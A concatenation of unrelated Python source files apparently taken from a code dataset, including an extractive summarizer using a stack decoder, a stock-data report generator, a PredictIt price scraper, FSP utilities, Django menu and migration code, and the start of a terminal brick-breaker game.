return float(sentence.getLocation_in_sentence()) / float(totSentences)
def getName(self):
return "SentPost"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class TfIdfCalculator(ImportanceScorer):
def __init__(self):
self.stats = None
self.totalDocs = 0
self.docMap = None
self.weightage = 1.0
def initialize(self,docs):
self.stats = {}
self.totalDocs = len(docs)
processes_docs = []
for doc in docs:
processes_docs.append(self.process(doc))
self.normalize()
self.initDocStats(docs)
def initDocStats(self,docs):
docMap = {}
for doc in docs:
pair = self.getDocStats(doc)
docMap[doc.getdoc_id_no()] = pair
self.docMap = docMap
def getDocStats(self,doc):
p = Pair()
for sent in doc.getSentences():
p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
p.avg /= doc.getNumberOfSentences()
for sent in doc.getSentences():
p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
p.stdDev /= doc.getNumberOfSentences()
p.stdDev = math.sqrt(p.stdDev)
return p
def getSentenceSum(self,docId,s):
score = 0.0
for word in s.getList_of_words():
score += self.getImportanceScore2(s.getdoc_id_no(), word)
return score
def getImportanceScore2(self, docId, word):
return self.stats[word][docId]
def getImportanceScore(self, doc, sentence):
p = None
if doc.getdoc_id_no() in self.docMap:
p = self.docMap[doc.getdoc_id_no()]
else:
p = self.getDocStats(doc)
self.docMap[doc.getdoc_id_no()] = p
score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
return float(score)/sentence.getSentenceLength()
def process(self,doc):
inverted_index = self.stats
id_no = doc.getdoc_id_no()
for sent in doc.getSentences():
for word in sent.getList_of_words():
ls = {}
if word in inverted_index:
ls = inverted_index[word]
if id_no in ls:
count = ls[id_no]
ls[id_no] = count+1
else:
ls[id_no] = 1
else:
ls[id_no]=1
inverted_index[word] = ls
self.stats = inverted_index
def normalize(self):
inverted_index = self.stats
for word in inverted_index.keys():
posting = inverted_index[word]
docfreq = len(posting.keys())
idf = 1
if self.totalDocs != docfreq:
idf = math.log(self.totalDocs/docfreq)
for docid in inverted_index[word].keys():
tfidf = (1+math.log(inverted_index[word][docid]))*idf
inverted_index[word][docid] = tfidf
self.stats = inverted_index
def getName(self):
return "TFIDFSum"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class TopKImpWordsCalculator(ImportanceScorer):
def __init__(self):
self.tfIdfStats = None
self.weightage = 1.0
def initialize(self,docs):
#Do Nothing
pass
def setTfIDFCalculator(self, tfidfcalculator):
self.tfIdfStats = tfidfcalculator
def getImportanceScore(self, doc, sentence):
if self.tfIdfStats is None:
return len(sentence.getList_of_words())
else:
sum=0
for word in sentence.getList_of_words():
score = self.tfIdfStats.getImportanceScore2(sentence.getdoc_id_no(), word)
if score >= THRESHOLDS.TFIDFThreshold:
sum = sum+1
return sum
def getName(self):
return "TopKImpWords"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
#################################################################################################################################################
#Overall Importance Module
class ImportanceModule:
def __init__(self,docs):
self.scorers=[]
is1 = TfIdfCalculator()
is1.setWeightage(1.0)
is1.initialize(docs)
self.scorers.append(is1)
is2 = SentenceLengthCalculator()
is2.setWeightage(1.0)
is2.initialize(docs)
self.scorers.append(is2)
is3 = SentencePosCalculator()
is3.setWeightage(1.0)
is3.initialize(docs)
self.scorers.append(is3)
is4 = NumLiteralsCalculator()
is4.setWeightage(1.0)
is4.initialize(docs)
self.scorers.append(is4)
is5 = UpperCaseCalculator()
is5.setWeightage(1.0)
is5.initialize(docs)
self.scorers.append(is5)
is6 = NounsCalculator()
is6.setWeightage(1.0)
is6.initialize(docs)
self.scorers.append(is6)
is7 = VerbsCalculator()
is7.setWeightage(1.0)
is7.initialize(docs)
self.scorers.append(is7)
is8 = AdjectivesCalculator()
is8.setWeightage(1.0)
is8.initialize(docs)
self.scorers.append(is8)
def setValues(self,docs):
for doc in docs:
for sentence in doc.getSentences():
sentence.setScore(self.getSentenceScore(doc,sentence))
def getSentenceScore(self,doc,sentence):
hyp = -0.839757
for imp_scr in self.scorers:
hyp+=(imp_scr.getImportanceScore(doc,sentence)*imp_scr.getWeightage())
return hyp
def setWeightsForImpScorers(self,weights):
for i in range(0,len(weights)):
self.scorers[i].setWeightage(weights[i])
###############################################################################################################################################
#Stack Decoder
class StackDecoder:
def __init__(self,documents):
self.stacks = []
self.simScoreCache = {}
self.documents = documents
self.sentences = self.buildSentenceList()
self.setUpStacks()
self.simScorer = TF_IDF_Similarity()
def setUpStacks(self):
for i in range(THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+2):
self.stacks.append(Stack())
def runStackDecoder(self):
self.initializeStack()
for i in range(THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+1):
print ("StackDecoder:runStackDecoder:: Running stack: " + str(i))
if self.stacks[i].pq.size==0:
continue
pqClone = self.stacks[i].pq.clone()
while(pqClone.hasNext()):
summary = pqClone.next()
for j in range(len(self.sentences)):
if j in summary:
continue
s = self.sentences[j]
newIndex = THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+1
if i+s.getSentenceLength() <= THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED:
newIndex = i+s.getSentenceLength()
if self.isIncludeSentence(summary, s, j):
newSummary = list(summary)
newSummary.append(j)
priority = self.getObjectiveFunction(newSummary)
if priority > self.stacks[newIndex].pq.getPriority():
self.stacks[newIndex].add(newSummary, priority)
self.stacks[i].printStackPQ()
def initializeStack(self):
for i in range(len(self.sentences)):
s = self.sentences[i]
l = []
l.append(i)
index = THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+1
if s.getSentenceLength()<=THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED:
index = s.getSentenceLength()
self.stacks[index].add(l, self.getObjectiveFunction(l))
def printStack(self, num):
self.stacks[num].printStackPQ()
def getObjectiveFunction(self,senRefList):
summaryObjectiveScore = 0
for i in senRefList:
summaryObjectiveScore += self.sentences[i].getScore()
return summaryObjectiveScore
def buildSentenceList(self):
sentences = []
senNum=-1;
for i in range(len(self.documents)):
print("StackDecoder:buildSentenceList:: Doc: " + str(i+1))
d = self.documents[i]
for s in d.getSentences():
if s.getSentenceLength()>=THRESHOLDS.MINIMUM_LENGTH_SENTENCE_ALLOWED:
sentences.append(s);
senNum = senNum+1
print("StackDecoder:buildSentenceList:: (" + str(senNum) + ")" + str(s.getActual_sentence()) + " - " + str(s.getScore()))
return sentences
def isIncludeSentence(self,summary, s, sIndex):
#returns whether the sentence should be included in the summary or not
for i in range(len(summary)):
key = str(sIndex)+","+ str(summary[i])
sim = 0;
if key in self.simScoreCache.keys():
sim = self.simScoreCache[key]
else:
sim = self.simScorer.get_score(s, self.sentences[summary[i]])
self.simScoreCache[key] = sim
if sim > THRESHOLDS.SIMILARITY_BOUND:
return False
return True
def dumpBestSummary(self,fileName):
f = open(fileName, 'w')
bestSummary = self.stacks[THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED].getBest()
length = THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED
while(bestSummary is None):
print(length)
length = length-1
bestSummary = self.stacks[length].getBest()
print(bestSummary)
bestSummary = sorted(bestSummary)
for senIndex in bestSummary:
s = self.sentences[senIndex]
f.write(s.getActual_sentence())
f.write('\n')
f.close()
################################################################################################################################################
#Stack for StackDecoder
class Stack:
def __init__(self):
self.pq = SpecialPQ()
def add(self,key,priority):
self.pq.add(key, priority)
def getBest(self):
return self.pq.peek()
def printStackPQ(self):
print ("StackDecoder:Stack:printStackPQ:: Stack print..")
print(self.pq.toString(self.pq.size))
###############################################################################################################################################
#Special Priority Queue
class SpecialPQ:
def __init__(self):
self.size = 0
self.capacity = self.getLegalCapacity(128)
self.elements = []
self.priorities = []
for i in range(self.capacity):
self.priorities.append(0)
def parent(self,loc):
return int((loc -1)/2)
def leftChild(self,loc):
return 2*loc+1
def rightChild(self,loc):
return 2*loc+2
def heapifyUp(self,loc):
if loc==0:
return
parent = self.parent(loc)
if (self.priorities[loc] > self.priorities[parent]):
self.swap(loc, parent)
self.heapifyUp(parent)
def heapifyDown(self,loc):
max_ = loc;
leftChild = self.leftChild(loc)
if (leftChild < self.size):
priority = self.priorities[loc]
leftChildPriority = self.priorities[leftChild]
if (leftChildPriority > priority):
max_ = leftChild
rightChild = self.rightChild(loc)
if (rightChild < self.size):
rightChildPriority = self.priorities[self.rightChild(loc)]
if (rightChildPriority > priority and rightChildPriority > leftChildPriority):
max_ = rightChild
if (max_ == loc):
return;
self.swap(loc, max_)
self.heapifyDown(max_)
def swap(self,loc1,loc2):
tempPriority = self.priorities[loc1]
tempElement = self.elements[loc1]
self.priorities[loc1] = self.priorities[loc2]
self.elements[loc1] = self.elements[loc2]
self.priorities[loc2] = tempPriority
self.elements[loc2] = tempElement
def removeFirst(self):
if (self.size < 1):
return
self.swap(0, self.size - 1)
self.size = self.size-1
self.elements.pop(self.size)
self.heapifyDown(0)
def hasNext(self):
return not self.isEmpty()
def next(self):
first = self.peek()
self.removeFirst()
return first
def peek(self):
if self.size > 0:
return self.elements[0]
else:
return None
def getPriority(self):
if (self.size > 0):
return self.priorities[0]
else:
return -1
def isEmpty(self):
return (self.size == 0)
def add(self,key, priority):
size = self.size
if (self.size == self.capacity):
index = self.getFringeIndex(self.capacity-1)
if(self.priorities[index] < priority):
self.elements.pop(index)
self.elements.append(key)
self.priorities[index] = priority
self.heapifyUp(index)
else:
self.elements.append(key)
self.priorities[size] = priority
self.heapifyUp(size)
self.size = self.size+1
return True
def getFringeIndex(self, i):
minIndex=-1;
parent = self.parent(i)
if(self.priorities[self.leftChild(parent)] < self.priorities[self.rightChild(parent)]):
minIndex = self.leftChild(parent)
else:
minIndex = self.rightChild(parent)
if(parent%2 == 0):
parent = parent+1
else:
parent = parent-1
if(self.priorities[self.leftChild(parent)] < self.priorities[self.rightChild(parent)]):
minIndex = self.leftChild(parent)
else:
minIndex = self.rightChild(parent);
return minIndex
def toString(self, maxKeysToPrint):
pq = self.clone()
sb = "["
numKeysPrinted = 0
while (numKeysPrinted < maxKeysToPrint and pq.hasNext()):
priority = pq.getPriority()
element = pq.next()
sb+=str(element)
sb+=" : "
sb+=str(priority)
if (numKeysPrinted < self.size - 1):
sb+=", "
numKeysPrinted = numKeysPrinted+1
if (numKeysPrinted < self.size):
sb+="..."
sb+="]"
return sb
def clone(self):
clonePQ = SpecialPQ()
clonePQ.size = self.size
clonePQ.capacity = self.capacity
clonePQ.elements = list(self.elements)
clonePQ.priorities = []
for i in range(clonePQ.capacity):
clonePQ.priorities.append(0)
if (self.size > 0):
for i in range(self.size):
clonePQ.priorities[i] = self.priorities[i]
return clonePQ
def getLegalCapacity(self,capacity):
legalCapacity = 0
while (legalCapacity < capacity):
legalCapacity = 2 * legalCapacity + 1
return legalCapacity
def isPowerOfTwo(self, num):
while(num > 1):
if(num % 2 != 0):
return False
num /= 2
return True
def trim(self, newsize):
if(newsize >= self.size):
return
if(not self.isPowerOfTwo(newsize+1)):
print("size must be of form (2^n)-1")
self.capacity = newsize;
newelems = []
newpriorities = []
for i in range(newsize):
pri = self.getPriority()
elem = self.next()
newelems.append(elem)
newpriorities.append(pri)
self.elements = newelems
self.priorities = newpriorities
self.capacity = newsize
self.size = newsize
###############################################################################################################################################
#Start Function
class Start:
@staticmethod
def main():
if len(sys.argv)!=2:
Start.usage()
sys.exit(-1)
in_time = int(round(time.time() * 1000))
print("In Time: "+str(in_time))
testDataSet = DataSet(sys.argv[1])
testDataSet.calculateImportanceScores(Start.getWeights())
print("DataSet Initialized")
print("Start:main:: Running stack decoder ..")
for t in testDataSet.getTopics():
sd = StackDecoder(t.getDocuments())
sd.runStackDecoder()
path = "/home/shivankit/Desktop/IR_Stack_decoder/summaries/" + str(testDataSet.getTopicName(t.gettopic_id_no()).upper())+".sum"
sd.dumpBestSummary(path)
out_time = int(round(time.time() * 1000))
print(out_time)
print ("Start:main:: Time taken by Stack decoder (s): " + str((out_time-in_time)/1000))
@staticmethod
def usage():
print ("Usage: python <main> <path to data>")
print ("Note: 'data' folder contains the sample input files.")
@staticmethod
#Note: Set theta_0 in importance module
#TFIDFSum,SentLength,SentPost,NumLiteralsCalculator,UpperCaseCalculator
def getWeights():
res = []
res.append(0.197971)
res.append(0.283136)
res.append(-0.300287)
res.append(0.1664)
res.append(0.160681)
#Semantic Features
res.append(0.160681)
res.append(-0.160681)
res.append(-0.160681)
return res
###############################################################################################################################################
#Main Function
if __name__ == "__main__":
Start.main()
|
10,555 | 891e93bdd3ffb0003344b45dce0ad920e79716ca | # -*- coding: utf-8 -*-
def getFrases():
frases = []
arquivo = open('quotes.txt', 'r')
for linha in arquivo:
frases += [linha]
arquivo.close()
return frases |
10,556 | fb5f04226bd50ccc0744680c5bc2595de894ea6b | import baostock as bs
import pandas as pd
import os
from datetime import datetime, timedelta
import time
import requests
from lxml import etree
import re
from downloader import bao_d, xueqiu_d, dongcai_d
from code_formmat import code_formatter
from basic_stock_data import basic
class StockProfit:
def generate_report(self):
print('start generate hs300 profit report')
hs300_df = pd.read_csv(os.path.join(
os.getcwd(), 'raw_data/hs300_stocks.csv'), index_col=1, encoding="gbk")
hs300_df = hs300_df.set_index("code")
profit_hs300_df = self.get_stock_profit_data(hs300_df)
print('start generate zz500 profit report')
zz500_df = pd.read_csv(os.path.join(
os.getcwd(), 'raw_data/zz500_stocks.csv'), index_col=1, encoding="gbk")
zz500_df = zz500_df.set_index("code")
profit_zz500_df = self.get_stock_profit_data(zz500_df)
profit_df = pd.concat([profit_hs300_df, profit_zz500_df])
# profit_df = profit_hs300_df
time_str = datetime.now().strftime('%H%M%S')
self.save2file(f'financial_zz800_{time_str}', profit_df)
# self.save2file(f'financial_hs300_{time_str}', profit_hs300_df)
# self.save2file(f'financial_zz500_{time_str}', profit_zz500_df)
def get_stock_profit_data(self, df_stocks):
code_list = df_stocks.index.tolist()
detail_dict = xueqiu_d.sync_stock_detail(code_list)
for code in code_list:
detail = detail_dict[code]
df_stocks.loc[code, 'm_cap'] = detail['market_value']
df_stocks.loc[code, 'f_cap'] = detail['float_market_capital']
df_stocks.loc[code, 'pe_ttm'] = detail['pe_ttm']
df_stocks.loc[code, 'pb'] = detail['pb']
df_stocks.loc[code, 'eps'] = detail['eps']
if detail['pb'] and detail['pe_ttm']:
df_stocks.loc[code, 'roe_ttm'] = detail['pb'] / \
detail['pe_ttm']
df_stocks.loc[code, 'price'] = detail['price']
df_stocks.loc[code, 'roe'] = detail['roe']
report_dict = dongcai_d.sync_report(code_list)
for code in code_list:
report = report_dict[code]
df_stocks.loc[code, 'update_date'] = pd.to_datetime(
report['update_date'])
df_stocks.loc[code, 'account_p'] = report['account_p']
df_stocks.loc[code, 'account_date'] = report['account_date']
df_stocks.loc[code, 'r_eps'] = report['eps']
df_stocks.loc[code, 'r_kfeps'] = report['kf_eps']
predict_dict = dongcai_d.sync_broker_predict(code_list)
for code in code_list:
predict = predict_dict[code]
df_stocks.loc[code, 'rate'] = float(predict['rate'])
df_stocks.loc[code, 'p_year'] = predict['thisyear']
df_stocks.loc[code, 'roe-1'] = predict['roe_list'][0]
df_stocks.loc[code, 'p_roe'] = predict['roe_list'][1]
df_stocks.loc[code, 'p_roe+1'] = predict['roe_list'][2]
df_stocks.loc[code, 'eps-1'] = predict['eps_list'][0]
if predict['eps_list'][1] and predict['eps_list'][0]:
df_stocks.loc[code, 'p_proyoy'] = (
predict['eps_list'][1]-predict['eps_list'][0])/abs(
predict['eps_list'][0])
df_stocks.loc[code, 'p_eps'] = predict['eps_list'][1]
df_stocks.loc[code, 'p_eps+1'] = predict['eps_list'][2]
if predict['pro_grow_ratio'] and detail['pe_ttm'] and detail['pe_ttm'] > 0:
df_stocks.loc[code, 'peg'] = detail['pe_ttm'] / \
predict['pro_grow_ratio']
# if predict[2] is not None:
# df_stocks.loc[code,'year2'] = predict[2,'year']
# df_stocks.loc[code,'eps2'] = float(predict[2,'value'])
# df_stocks.loc[code,'ratio2'] = float(predict[2,'ratio'])
req_info = [{'code': code,
'last_report_date': datetime.fromisoformat(
df_stocks.loc[code, 'account_date'])
} for code in code_list]
adv_dict = dongcai_d.sync_advance_report(req_info)
for code in code_list:
adv = adv_dict[code]
if adv:
df_stocks.loc[code, 'adv_date'] = pd.to_datetime(
adv['release_date'])
df_stocks.loc[code, 'is_adv'] = 'Y'
expr_dict = dongcai_d.sync_express_report(req_info)
for code in code_list:
expr = expr_dict[code]
if expr:
df_stocks.loc[code, 'expr_date'] = pd.to_datetime(
expr['release_date'])
df_stocks.loc[code, 'expr_period'] = expr['expr_period']
df_stocks.loc[code, 'expr_eps'] = expr['eps']
for code in code_list:
url_format = 'https://data.eastmoney.com/stockdata/{}.html'
df_stocks.loc[code, 'url'] = url_format.format(
code_formatter.code2code_without_char(code))
fund_hold_dict = dongcai_d.sync_fund_holding(code_list)
for code in code_list:
fund_hold = fund_hold_dict[code]
df_stocks.loc[code, 'f_hold'] = fund_hold['last_quarter']
df_stocks.loc[code, 'f_last'] = fund_hold['last_2quarter']
if fund_hold['last_quarter'] and fund_hold['last_2quarter']:
df_stocks.loc[code, 'f_chg'] = fund_hold['last_quarter'] - \
fund_hold['last_2quarter']
else:
df_stocks.loc[code, 'f_chg'] = None
return df_stocks
def save2file(self, filename, df):
folder_name = datetime.now().strftime('%Y%b%d')
if not os.path.exists(f'./raw_data/{folder_name}'):
os.mkdir(f'./raw_data/{folder_name}')
df = df[['code_name', 'industry', 'pe_ttm', 'pb', 'peg', 'price',
'm_cap', 'f_cap', 'f_hold', 'f_last', 'f_chg',
'rate', 'update_date', 'account_p', 'r_eps', 'r_kfeps',
'p_year', 'eps-1', 'p_eps', 'p_eps+1',
'roe-1', 'roe_ttm', 'p_roe', 'p_roe+1',
'expr_date', 'expr_period', 'expr_eps', 'adv_date', 'url']]
writer = pd.ExcelWriter(f'./raw_data/{folder_name}/{filename}.xlsx',
datetime_format='yyyy-mm-dd',
engine='xlsxwriter',
options={'remove_timezone': True})
# Convert the dataframe to an XlsxWriter Excel object.
df.to_excel(writer, encoding="gbk", sheet_name='Sheet1')
# Get the xlsxwriter workbook and worksheet objects.
workbook = writer.book
worksheet = writer.sheets['Sheet1']
# Add some cell formats.
# format1 = workbook.add_format({'num_format': 'yyyy-mm-dd'})
format1 = workbook.add_format({'num_format': '0.00'})
format2 = workbook.add_format({'num_format': '0.00%'})
# row_format = workbook.add_format({'bg_color': 'green'})
# Note: It isn't possible to format any cells that already have a format such
# as the index or headers or any cells that contain dates or datetimes.
# Set the format but not the column width.
# worksheet.set_column('E:E', None, format1)
worksheet.set_column('D:I', None, format1)
worksheet.set_column('J:L', None, format2)
worksheet.set_column('P:Q', None, format1)
worksheet.set_column('S:U', None, format1)
worksheet.set_column('V:Y', None, format2)
# worksheet.set_row(0, None, row_format)
# Freeze the first row.
worksheet.freeze_panes(1, 3)
# Close the Pandas Excel writer and output the Excel file.
writer.save()
profit = StockProfit()
if __name__ == '__main__':
profit.generate_report()
|
10,557 | 7583811dfce69089e6c2e6e80da21eb4a61704ca | #!/usr/bin/env Python3
import requests
import json
import datetime
import time
from pymongo import MongoClient
client = MongoClient()
db = client.predictit_data
hist = db.historical
url = "https://www.predictit.org/api/marketdata/all/"
prev_entries = {}
while(True):
start = datetime.datetime.now()
try:
ret = requests.get(url, timeout = 10).text
except Exception:
print("Timeout")
time.sleep(1800)
continue
for market in json.loads(ret)["Markets"]:
for contract in market["Contracts"]:
entry = { "name" : contract["LongName"],
"LastTradePrice" : contract["LastTradePrice"],
"BestBuyYesCost" : contract["BestBuyYesCost"],
"BestBuyNoCost" : contract["BestBuyNoCost"],
"BestSellYesCost" : contract["BestSellYesCost"],
"BestSellNoCost" : contract["BestSellNoCost"],
"LastClosePrice" : contract["LastClosePrice"],
"Time" : str(datetime.datetime.now())
}
if (entry["name"] in prev_entries and entry != prev_entries[entry["name"]]):
post_id = hist.insert_one(entry)
prev_entries[entry["name"]]= entry
finish = datetime.datetime.now()
print("Data Collected at %s" % str(finish) )
time_elapsed = (finish-start).total_seconds()
if(time_elapsed < 30):
time.sleep(30-time_elapsed) |
10,558 | 551f7b26d083a3fe3ad353e76a6c248d2dba1a97 | """
Common utility routines for Finite State Projection.
"""
import operator
import numpy
from cmepy.cme_matrix import non_neg_states
from cmepy import lexarrayset
def maxproppercent(propensities, percent_prop):
maxVal = propensities[0]
for i in range(0, len(propensities), 1):
if maxVal < propensities[i]:
maxVal = propensities[i]
percent_propen = float(percent_prop)
max_propensity_val = operator.mul(maxVal, percent_propen)
return max_propensity_val
def ignorereaction(propensities, newarray):
Oldlength = len(propensities)
#max_propensity = maxproppercent(propensities, percent_prop)
for i in propensities:
if i < 20.03:
propensities.remove(i)
Newlength = len(propensities)
k = Oldlength - Newlength
truncated_new_transitions = newarray[: len(newarray) - k]
return truncated_new_transitions
def grow_domain(domain_states, transitions, depth, validity_test = None):
"""
Returns domain_states grown by depth along transitions.
Resulting states are filtered by the validity_test. By default,
only states without a negative coordinate are valid.
"""
if numpy.size(domain_states) == 0:
raise ValueError('there must be at least one state to expand')
if validity_test is None:
validity_test = non_neg_states
expanded_states = domain_states
for _ in xrange(depth):
# expand support states by one along each state transition
for transition in transitions:
level_states = domain_states
# expand support states by transition upto bound limit
for _ in xrange(3):
new_level_states = lexarrayset.shift(level_states, transition)
valid = validity_test(new_level_states)
new_level_states = new_level_states[:, valid]
expanded_states = lexarrayset.union(
expanded_states,
new_level_states
)
level_states = expanded_states
domain_states = level_states
return expanded_states
"""
def ignorereaction(propensities, newarray, percent):
max_propensity = max(propensities)
Oldlength = len(propensities)
for i in propensities:
if i < (max_propensity * percent):
propensities.remove(i)
Newlength = len(propensities)
k = Oldlength - Newlength
truncated_new_transitions = newarray[: len(newarray) - k]
return truncated_new_transitions
"""
"""
def reorder(propensities, transitions, no_of_reactions):
mapping = {k: i for i, k in enumerate(sorted(propensities, reverse=True))}
new_index = ([mapping[i] for i in propensities])
for i in xrange(0,no_of_reactions):
while (new_index[i] != i):
oldTargetI = new_index[new_index[i]]
oldTargetE = transitions[new_index[i]]
transitions[new_index[i]] = (transitions[i])
new_index[new_index[i]] = (new_index[i])
new_index[i] = oldTargetI
transitions[i] = oldTargetE
newarray = []
for i in xrange(0, no_of_reactions):
newarray.append(transitions[i])
#print newarray
newindex = []
for i in xrange(0, no_of_reactions):
newindex.append(new_index[i])
#print newindex
return newarray
"""
"""
def maxpropval(propensities):
maxVal = propensities[0]
for i in range(0, len(propensities), 1):
if maxVal < propensities[i]:
maxVal = propensities[i]
return maxVal
def maxproppercent(propensities, percent_prop):
max_val = maxpropval(propensities)
percent_propen = int(percent_prop)
max_propensity = operator.__mul__(max_val, percent_propen)
return max_propensity
def ignorereaction(propensities, newarray, percent_prop):
Oldlength = len(propensities)
max_propensity = maxproppercent(propensities, percent_prop)
for i in propensities:
if i < (max_propensity):
propensities.remove(i)
Newlength = len(propensities)
k = Oldlength - Newlength
truncated_new_transitions = newarray[: len(newarray) - k]
return truncated_new_transitions
""" |
10,559 | eb51106cf41d32e8961d7a339a0b4b6440e265fb | from django.urls import reverse
from menu import Menu, MenuItem
Menu.add_item(
"main",
MenuItem(
"Add presentation",
reverse("presentation-manager:presentation-add"),
weight=1000,
check=lambda request: request.user.is_authenticated
and request.user.has_perm("presentation_manager.add_presentation"),
),
)
Menu.add_item(
"main",
MenuItem(
"List presentations",
reverse("presentation-manager:presentation-list"),
weight=1000,
check=lambda request: request.user.is_authenticated
and request.user.has_perm("presentation_manager.view_presentation"),
),
)
Menu.add_item(
"main",
MenuItem(
"Login",
reverse("login"),
weight=1000,
check=lambda request: not request.user.is_authenticated,
),
)
Menu.add_item(
"main",
MenuItem(
"Logout",
reverse("logout"),
weight=1000,
check=lambda request: request.user.is_authenticated,
),
)
|
10,560 | c926e3500c2606a42c4745dbd26121af31a7a210 | import pandas as pd
from sys import argv
import os
import glob
import datetime
#The goal is to replace the Resource_List.wall_time from current accounting file
# with the newly predicted value from the model
# The argument has the following order:
# 1. Full path of parsed CSV accounting file
# 2. Directory of input accounting files
# 3. Directory location of output accounting files
def read_into_txt():
dest = argv[2]
content = []
statusArray = ["Q", "S", "B", "E"]
files = glob.glob(dest + "/*")
for f in files:
with open(f, "r") as infile:
parsedDate = f.split('/')
output_File = open(argv[3] + parsedDate[-1], 'w')
data = infile.readlines()
for line in data:
if ((line.split("/")[0].isdigit()) and (line.split(";")[1] == "E")):
element = line.split(' ')
sessionName = 0
qtime = 0
wallTimeLoc = 0
entity = element[1].split(';')[2].split('.')[0]
if not ('[' in entity):
for i in range(0,len(element)):
if ('session' in element[i]):
sessionName = int(element[i].split('=')[1])
elif ('qtime' in element[i]):
qtime = int(element[i].split('=')[1])
elif ('Resource_List.walltime' in element[i]):
wallTimeLoc = i
if (((int(entity), qtime, sessionName) in mapModified.keys())):
element[wallTimeLoc] = 'Resource_List.walltime=' + str(mapModified[(int(entity), qtime, sessionName)])
writeLine = ' '.join(element)
output_File.write(writeLine)
else:
output_File.write(line)
# Entity, qtime and session help define distinct submitted jobs
fields = ['Entity', 'qtime', 'session', 'Modified Resource_List.walltime']
mapModified = {}
def main():
df = pd.read_csv(argv[1], usecols=fields)
entityArr = df['Entity'].values
qtimeArr = df['qtime'].values
sessionArr = df['session'].values
wallTimeArr = df['Modified Resource_List.walltime'].values
for i in range (len(wallTimeArr)):
correctedTime = datetime.timedelta(0, wallTimeArr[i])
mapModified[entityArr[i], qtimeArr[i], sessionArr[i]] = correctedTime
read_into_txt()
if __name__ == "__main__":
main() |
10,561 | ced72b9c3b44cd035591a3e6adc05fd33931da42 | import random
import uuid
from temperatures import models
import datetime
from django.utils import timezone
first = timezone.now()
offset = datetime.timedelta(minutes=1)
DUMMY_UUID = uuid.UUID('12345678123456781234567812345678')
dades = 3600
device, _ = models.Device.objects.get_or_create(identifier=DUMMY_UUID)
for i in range(0, dades):
temp = random.randint(0, 40)
models.Temperature.objects.create(temperature=temp, device=device, datetime=first)
first = first - offset
|
10,562 | f7749518ddcbffa5dce9f04a1ae1f54e4f191019 | print "How my order cost?"
print "Cell phones 2 * Nokia 101 - 2 * 274 = ", 2 * 274
|
10,563 | aaa9c50d93f46972d402a9979ba19b3231fecf0e | # -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2020-01-20 22:54
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hqadmin', '0009_auto_20170315_1322'),
]
operations = [
migrations.CreateModel(
name='SQLHqDeploy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateTimeField(db_index=True, default=datetime.datetime.utcnow)),
('user', models.CharField(max_length=100)),
('environment', models.CharField(max_length=100)),
('diff_url', models.CharField(max_length=126, null=True)),
('couch_id', models.CharField(db_index=True, max_length=126, null=True)),
],
options={
'db_table': 'hqadmin_hqdeploy',
},
),
]
|
10,564 | a1e2cbfe73c8889bca05dd05a02ef1789bb61a68 | def sumDigits(n):
result = 0
while(n != 0):
result += n % 10
n //= 10
return result
def main():
n = int(input('Enter a number between 0 and 1000 : '))
result = sumDigits(n)
print('The sum of the digits is', result)
if __name__ == "__main__":
main() |
10,565 | 5b0758ad1120b5d44e35e3c37a150ecc4e9fcd57 | """Defining input class."""
import sys
import termios
import tty
import signal
import os
import time
import random
import numpy as np
from config import *
from screen import *
from brick import *
from paddle import *
from ball import *
from powerup import *
from bullet import *
from input import *
class Game:
def __init__(self, lives, score, lvl):
self.__input = KBHit()
self.__screen = Screen()
self.__start = time.time()
if(lvl != lvlnum):
self.__brickCtr = (int)((cols - 4) / (3 * (lvlnum - lvl)))
self.__bricks = []
self.__powers = []
self.__explode = []
self.__bullets = []
self.__bombs = []
self.__lifeRec = True
self.__moveBr = 0
self.__spawn = False
self.__lives = lives
self.__score = score
self.__lvl = lvl
# np.empty((6, self.__brickCtr))
for i in range(0, 6):
if(self.__lvl == lvlnum):
break
self.__bricks.append([])
for j in range(0, self.__brickCtr):
if(i == j):
self.__bricks[i].append(Brick(1, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
# placing unbreakable bricks
elif(self.__brickCtr - 1 - j == i):
self.__bricks[i].append(Brick(1, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
# placing unbreakable bricks
elif(i == j - 1):
self.__bricks[i].append(Brick(2, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
# placing exploding bricks
elif(self.__brickCtr - 2 - j == i):
self.__bricks[i].append(Brick(2, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
# placing exploding bricks
elif(j == (int)(self.__brickCtr / 2)):
self.__bricks[i].append(Brick(0, [2 + i, 2 + 3 * (lvlnum - lvl) * j], True))
else:
self.__bricks[i].append(Brick(0, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
# placing normal bricks
# placing powerups
#NOTE: Always append padShoot after padExpand and padShrink for shape purposes
if(lvl != lvlnum):
self.__powers.append(padExpand(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
self.__powers.append(padShrink(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
self.__powers.append(ballMul(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
self.__powers.append(ballFast(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
self.__powers.append(ballThru(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
self.__powers.append(padGrab(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
